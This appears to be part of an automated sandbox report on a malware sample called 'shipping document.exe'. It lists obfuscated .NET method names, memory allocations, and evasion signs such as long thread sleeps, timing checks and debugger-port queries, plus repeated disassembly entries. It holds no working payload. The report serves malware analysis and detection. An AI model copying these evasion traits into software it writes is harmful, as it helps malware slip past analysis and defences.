              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, LPvi3oP3RIhwgOcdmE.csHigh entropy of concatenated method names: 'jOJjZbJoMs', 'XPKjBdh8Yt', 'ToString', 'eCBjX6LUgQ', 'zJsjuEeDu0', 'mysjMkZL3O', 'l9KjNg4rGE', 'DPMj2ln57p', 'cT4jCKmgun', 'INyjrZHADc'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, y5Qi5ClcJClfyxEEUt.csHigh entropy of concatenated method names: 'qvg7wG16T', 'vD4PNX64K', 'ld4U4WvOh', 'ASb4I1Vhd', 'jFQYsDsuG', 'T7hHVx31q', 'o7QI4WL4Ox7aptVets', 'jMYNL8pXTmOW9Z3Nq8', 'DCGifCvGD', 'WYIG3xnnS'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, DP3hNizluiilH0Kbtj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wS10xJy5Sa', 'Ij10OR4JJT', 'iOw0vKYQwK', 'j1I0jUTYSm', 'v3L0i3xUUE', 'n7D00ZYxQn', 'G1I0Gl2iRh'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GAKx9mnM0VBWIobfpZ.csHigh entropy of concatenated method names: 'bS8iXPs3qm', 'FM1iuRxWgR', 'grMiMukUTq', 'ffxiN67Ris', 'nP8i25rk9G', 'HaSiCnTSi6', 'SUnirydR3d', 'p0Qi8N9yk0', 'zkTiZ2BZug', 'GJgiBoOMyu'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, Do078usZjI0jdkJhZb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'c6Rh9tX3l0', 'b4Kha4ToaO', 'yF8hzhZc6x', 'cfWLw0yx5D', 'SJBLsRXNof', 'MiELhBiLCh', 'S7yLL0AKw9', 'PKqcS62uwcRc4IYrumL'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, xOtm9kyFM4kmikJTQP.csHigh entropy of concatenated method names: 'xx3sCVJP7Y', 'RDlsr5xvlp', 'C3bsZtuEe1', 'AaVsBoIT90', 'qnRsOAQCIp', 'IaxsvVTG6a', 'xPvhg2mJs6jKLlXy7g', 'hn3th4NRDsHrtJ1RXu', 'wwun4Z1QVekaIeSgM0', 'R20ssyNNSI'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.csHigh entropy of concatenated method names: 'KNALTLU5re', 'LMOLXAQHwl', 'wt2LuHNApy', 'HqFLMhGCR7', 'eo0LNRVT6g', 'KrgL2l05xl', 'sHFLCKwntW', 'k0FLr2TVx6', 'RccL8yTZBh', 'EHjLZOYIEH'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, hrjkNWo5sorSlwedoL.csHigh entropy of concatenated method names: 'CESCD2KnPA', 'LjEC6dUa1Y', 'zBrC7GGIdx', 'X91CPpb3ij', 'Xn9CfcgkQ6', 'BNuCUItcti', 'IBKC4aQbGu', 'KWuCdT9YJT', 'F0qCYWCLAC', 'INwCHI9AIV'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, iKb0caErrx0OaEK35J.csHigh entropy of concatenated method names: 'HxS2TNnegw', 'yY42uF3Z38', 'kTM2NlIlZO', 'FPd2CXNcWn', 'pRU2rlECKD', 'IMANoSQ27h', 'f4GNE8hoSk', 'm77NFa1WhS', 'XmeNqPa5GL', 'vGSN9gF23W'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, skp1uwharrgpfQKevg.csHigh entropy of concatenated method names: 'EsrMPu912D', 'nl9MU61B63', 'MgoMdrSQHy', 'FWoMY9VF7M', 'ceQMOpPFxR', 'GJ4MvaGFZp', 'YNQMjbiLsx', 'TBZMiKcvGF', 'hf7M0dqMqB', 'qLhMGHXZ1b'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, YDmVa3b2SMMfc8PDHv.csHigh entropy of concatenated method names: 'gYBuJN9rEx', 'Hbuu3NCpke', 'qFNuAIN9dZ', 'mYWueL9Vfb', 'hwluoBxrs3', 'NjwuE1xRmI', 'eYVuFyvpfo', 'Q7Juq2DQQ7', 'AC9u9DJTcr', 'DDNuahU9H3'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, omX1sAmpb7YlgoyEOa.csHigh entropy of concatenated method names: 'lf9jqTj4FA', 'Kyfjabxrm9', 'Kveiw95qT7', 'vbSisxBjrh', 't05jbioFSF', 'CJGjIqPfcn', 'alxjWZrc3c', 'vHYjJs4Gnc', 'WhHj3LZ7oE', 'INljAcxIOk'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, QFbnZv5nUopkM31AEm.csHigh entropy of concatenated method names: 'zum0si84un', 'xNV0LbWBrA', 'Hwb0tM3qsV', 'bqZ0X7R5Rl', 'FLV0uWem5H', 'z9M0NQQ6It', 'BUf02pAQGf', 'CxSiFXhlhx', 'FyRiqrYqVF', 'p3ji9UZjtB'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, L80iZtF00YB24EpXgL.csHigh entropy of concatenated method names: 'wW5xdRCfZx', 'Xg6xYnFlJE', 'Oh6x1W6C4f', 'MA8xS5GL5o', 'PFfxRDdMLU', 'DXKx57J8QE', 'wkJxpYN0qt', 'm5nxKbe9O9', 'zTTxQP8Tve', 'HLexbOvGlN'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, ejoofSV7fnSjUw2fi6.csHigh entropy of concatenated method names: 'Re1CXD0QXu', 'WTNCM9Oof7', 'uq4C2hukhw', 'tsm2aStNq9', 'L4n2z51Cp5', 'IVOCwcmiYQ', 'kqJCsBO9YC', 'welChY4ljj', 'KJPCLsZbxs', 'nIbCtIyaEj'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, xMm9lx8h3995ywK4BF.csHigh entropy of concatenated method names: 'Dispose', 'Ua2s9FEIGV', 'fMlhS5qrWP', 'x0GVVJ6G8Y', 'ThqsaY4Pjv', 'm87szn8ZJu', 'ProcessDialogKey', 'I50hwR3cvu', 'SJBhsi6qx2', 'oj4hhRxXwi'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, iG14yNa7nO8cosR7XGL.csHigh entropy of concatenated method names: 'tPB0DlTMiG', 'lW106Lp4FB', 'Aon074uARG', 'D8m0PtWLCV', 'zut0faXsrg', 'Nri0UPs5D2', 'mTo04mg48b', 'LD40dqnuZc', 'uZQ0YpuL9A', 'N7j0HK1nwB'
              Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
              Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, LPvi3oP3RIhwgOcdmE.csHigh entropy of concatenated method names: 'jOJjZbJoMs', 'XPKjBdh8Yt', 'ToString', 'eCBjX6LUgQ', 'zJsjuEeDu0', 'mysjMkZL3O', 'l9KjNg4rGE', 'DPMj2ln57p', 'cT4jCKmgun', 'INyjrZHADc'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, y5Qi5ClcJClfyxEEUt.csHigh entropy of concatenated method names: 'qvg7wG16T', 'vD4PNX64K', 'ld4U4WvOh', 'ASb4I1Vhd', 'jFQYsDsuG', 'T7hHVx31q', 'o7QI4WL4Ox7aptVets', 'jMYNL8pXTmOW9Z3Nq8', 'DCGifCvGD', 'WYIG3xnnS'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, DP3hNizluiilH0Kbtj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wS10xJy5Sa', 'Ij10OR4JJT', 'iOw0vKYQwK', 'j1I0jUTYSm', 'v3L0i3xUUE', 'n7D00ZYxQn', 'G1I0Gl2iRh'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GAKx9mnM0VBWIobfpZ.csHigh entropy of concatenated method names: 'bS8iXPs3qm', 'FM1iuRxWgR', 'grMiMukUTq', 'ffxiN67Ris', 'nP8i25rk9G', 'HaSiCnTSi6', 'SUnirydR3d', 'p0Qi8N9yk0', 'zkTiZ2BZug', 'GJgiBoOMyu'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, Do078usZjI0jdkJhZb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'c6Rh9tX3l0', 'b4Kha4ToaO', 'yF8hzhZc6x', 'cfWLw0yx5D', 'SJBLsRXNof', 'MiELhBiLCh', 'S7yLL0AKw9', 'PKqcS62uwcRc4IYrumL'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, xOtm9kyFM4kmikJTQP.csHigh entropy of concatenated method names: 'xx3sCVJP7Y', 'RDlsr5xvlp', 'C3bsZtuEe1', 'AaVsBoIT90', 'qnRsOAQCIp', 'IaxsvVTG6a', 'xPvhg2mJs6jKLlXy7g', 'hn3th4NRDsHrtJ1RXu', 'wwun4Z1QVekaIeSgM0', 'R20ssyNNSI'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.csHigh entropy of concatenated method names: 'KNALTLU5re', 'LMOLXAQHwl', 'wt2LuHNApy', 'HqFLMhGCR7', 'eo0LNRVT6g', 'KrgL2l05xl', 'sHFLCKwntW', 'k0FLr2TVx6', 'RccL8yTZBh', 'EHjLZOYIEH'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, hrjkNWo5sorSlwedoL.csHigh entropy of concatenated method names: 'CESCD2KnPA', 'LjEC6dUa1Y', 'zBrC7GGIdx', 'X91CPpb3ij', 'Xn9CfcgkQ6', 'BNuCUItcti', 'IBKC4aQbGu', 'KWuCdT9YJT', 'F0qCYWCLAC', 'INwCHI9AIV'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, iKb0caErrx0OaEK35J.csHigh entropy of concatenated method names: 'HxS2TNnegw', 'yY42uF3Z38', 'kTM2NlIlZO', 'FPd2CXNcWn', 'pRU2rlECKD', 'IMANoSQ27h', 'f4GNE8hoSk', 'm77NFa1WhS', 'XmeNqPa5GL', 'vGSN9gF23W'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, skp1uwharrgpfQKevg.csHigh entropy of concatenated method names: 'EsrMPu912D', 'nl9MU61B63', 'MgoMdrSQHy', 'FWoMY9VF7M', 'ceQMOpPFxR', 'GJ4MvaGFZp', 'YNQMjbiLsx', 'TBZMiKcvGF', 'hf7M0dqMqB', 'qLhMGHXZ1b'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, YDmVa3b2SMMfc8PDHv.csHigh entropy of concatenated method names: 'gYBuJN9rEx', 'Hbuu3NCpke', 'qFNuAIN9dZ', 'mYWueL9Vfb', 'hwluoBxrs3', 'NjwuE1xRmI', 'eYVuFyvpfo', 'Q7Juq2DQQ7', 'AC9u9DJTcr', 'DDNuahU9H3'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, omX1sAmpb7YlgoyEOa.csHigh entropy of concatenated method names: 'lf9jqTj4FA', 'Kyfjabxrm9', 'Kveiw95qT7', 'vbSisxBjrh', 't05jbioFSF', 'CJGjIqPfcn', 'alxjWZrc3c', 'vHYjJs4Gnc', 'WhHj3LZ7oE', 'INljAcxIOk'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, QFbnZv5nUopkM31AEm.csHigh entropy of concatenated method names: 'zum0si84un', 'xNV0LbWBrA', 'Hwb0tM3qsV', 'bqZ0X7R5Rl', 'FLV0uWem5H', 'z9M0NQQ6It', 'BUf02pAQGf', 'CxSiFXhlhx', 'FyRiqrYqVF', 'p3ji9UZjtB'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, L80iZtF00YB24EpXgL.csHigh entropy of concatenated method names: 'wW5xdRCfZx', 'Xg6xYnFlJE', 'Oh6x1W6C4f', 'MA8xS5GL5o', 'PFfxRDdMLU', 'DXKx57J8QE', 'wkJxpYN0qt', 'm5nxKbe9O9', 'zTTxQP8Tve', 'HLexbOvGlN'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, ejoofSV7fnSjUw2fi6.csHigh entropy of concatenated method names: 'Re1CXD0QXu', 'WTNCM9Oof7', 'uq4C2hukhw', 'tsm2aStNq9', 'L4n2z51Cp5', 'IVOCwcmiYQ', 'kqJCsBO9YC', 'welChY4ljj', 'KJPCLsZbxs', 'nIbCtIyaEj'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, xMm9lx8h3995ywK4BF.csHigh entropy of concatenated method names: 'Dispose', 'Ua2s9FEIGV', 'fMlhS5qrWP', 'x0GVVJ6G8Y', 'ThqsaY4Pjv', 'm87szn8ZJu', 'ProcessDialogKey', 'I50hwR3cvu', 'SJBhsi6qx2', 'oj4hhRxXwi'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, iG14yNa7nO8cosR7XGL.csHigh entropy of concatenated method names: 'tPB0DlTMiG', 'lW106Lp4FB', 'Aon074uARG', 'D8m0PtWLCV', 'zut0faXsrg', 'Nri0UPs5D2', 'mTo04mg48b', 'LD40dqnuZc', 'uZQ0YpuL9A', 'N7j0HK1nwB'
              Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
              Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: Yara matchFile source: Process Memory Space: shipping document.exe PID: 6192, type: MEMORYSTR
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 33A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 31A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 7FA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 8FA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 9140000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: A140000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: A6D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: B6D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: C6D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A096E rdtsc 2_2_017A096E
              Source: C:\Users\user\Desktop\shipping document.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeWindow / User API: threadDelayed 9822Jump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\openfiles.exeAPI coverage: 2.6 %
              Source: C:\Users\user\Desktop\shipping document.exe TID: 6416Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452Thread sleep count: 149 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452Thread sleep time: -298000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452Thread sleep count: 9822 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452Thread sleep time: -19644000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704Thread sleep time: -75000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704Thread sleep time: -45000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704Thread sleep count: 40 > 30Jump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704Thread sleep time: -40000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027AB970 FindFirstFileW,FindNextFileW,FindClose,7_2_027AB970
              Source: oWRaEnEJAq.exe, 00000008.00000002.4110608352.00000000014F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2318590089.000002CA98FEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\shipping document.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_00417513 LdrLoadDll,2_2_00417513
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178A470 mov eax, dword ptr fs:[00000030h]2_2_0178A470
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181A49A mov eax, dword ptr fs:[00000030h]2_2_0181A49A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EC460 mov ecx, dword ptr fs:[00000030h]2_2_017EC460
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178245A mov eax, dword ptr fs:[00000030h]2_2_0178245A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175645D mov eax, dword ptr fs:[00000030h]2_2_0175645D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175C427 mov eax, dword ptr fs:[00000030h]2_2_0175C427
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175E420 mov eax, dword ptr fs:[00000030h]2_2_0175E420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175E420 mov eax, dword ptr fs:[00000030h]2_2_0175E420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175E420 mov eax, dword ptr fs:[00000030h]2_2_0175E420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01798402 mov eax, dword ptr fs:[00000030h]2_2_01798402
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01798402 mov eax, dword ptr fs:[00000030h]2_2_01798402
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01798402 mov eax, dword ptr fs:[00000030h]2_2_01798402
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017604E5 mov ecx, dword ptr fs:[00000030h]2_2_017604E5
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017944B0 mov ecx, dword ptr fs:[00000030h]2_2_017944B0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EA4B0 mov eax, dword ptr fs:[00000030h]2_2_017EA4B0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181A456 mov eax, dword ptr fs:[00000030h]2_2_0181A456
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017664AB mov eax, dword ptr fs:[00000030h]2_2_017664AB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768770 mov eax, dword ptr fs:[00000030h]2_2_01768770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180678E mov eax, dword ptr fs:[00000030h]2_2_0180678E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018147A0 mov eax, dword ptr fs:[00000030h]2_2_018147A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EE75D mov eax, dword ptr fs:[00000030h]2_2_017EE75D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760750 mov eax, dword ptr fs:[00000030h]2_2_01760750
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2750 mov eax, dword ptr fs:[00000030h]2_2_017A2750
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2750 mov eax, dword ptr fs:[00000030h]2_2_017A2750
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E4755 mov eax, dword ptr fs:[00000030h]2_2_017E4755
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179674D mov esi, dword ptr fs:[00000030h]2_2_0179674D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179674D mov eax, dword ptr fs:[00000030h]2_2_0179674D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179674D mov eax, dword ptr fs:[00000030h]2_2_0179674D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179273C mov eax, dword ptr fs:[00000030h]2_2_0179273C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179273C mov ecx, dword ptr fs:[00000030h]2_2_0179273C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179273C mov eax, dword ptr fs:[00000030h]2_2_0179273C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DC730 mov eax, dword ptr fs:[00000030h]2_2_017DC730
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C720 mov eax, dword ptr fs:[00000030h]2_2_0179C720
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C720 mov eax, dword ptr fs:[00000030h]2_2_0179C720
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760710 mov eax, dword ptr fs:[00000030h]2_2_01760710
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01790710 mov eax, dword ptr fs:[00000030h]2_2_01790710
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C700 mov eax, dword ptr fs:[00000030h]2_2_0179C700
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017647FB mov eax, dword ptr fs:[00000030h]2_2_017647FB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017647FB mov eax, dword ptr fs:[00000030h]2_2_017647FB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017827ED mov eax, dword ptr fs:[00000030h]2_2_017827ED
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017827ED mov eax, dword ptr fs:[00000030h]2_2_017827ED
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017827ED mov eax, dword ptr fs:[00000030h]2_2_017827ED
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EE7E1 mov eax, dword ptr fs:[00000030h]2_2_017EE7E1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176C7C0 mov eax, dword ptr fs:[00000030h]2_2_0176C7C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E07C3 mov eax, dword ptr fs:[00000030h]2_2_017E07C3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017607AF mov eax, dword ptr fs:[00000030h]2_2_017607AF
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01792674 mov eax, dword ptr fs:[00000030h]2_2_01792674
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A660 mov eax, dword ptr fs:[00000030h]2_2_0179A660
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A660 mov eax, dword ptr fs:[00000030h]2_2_0179A660
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177C640 mov eax, dword ptr fs:[00000030h]2_2_0177C640
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177E627 mov eax, dword ptr fs:[00000030h]2_2_0177E627
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01796620 mov eax, dword ptr fs:[00000030h]2_2_01796620
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01798620 mov eax, dword ptr fs:[00000030h]2_2_01798620
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176262C mov eax, dword ptr fs:[00000030h]2_2_0176262C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2619 mov eax, dword ptr fs:[00000030h]2_2_017A2619
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE609 mov eax, dword ptr fs:[00000030h]2_2_017DE609
